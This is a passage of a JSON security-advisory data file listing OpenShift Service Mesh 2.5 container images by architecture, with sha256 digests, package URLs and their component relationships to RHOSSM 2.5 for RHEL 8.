}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64 as a component of RHOSSM 2.5 for RHEL 8",
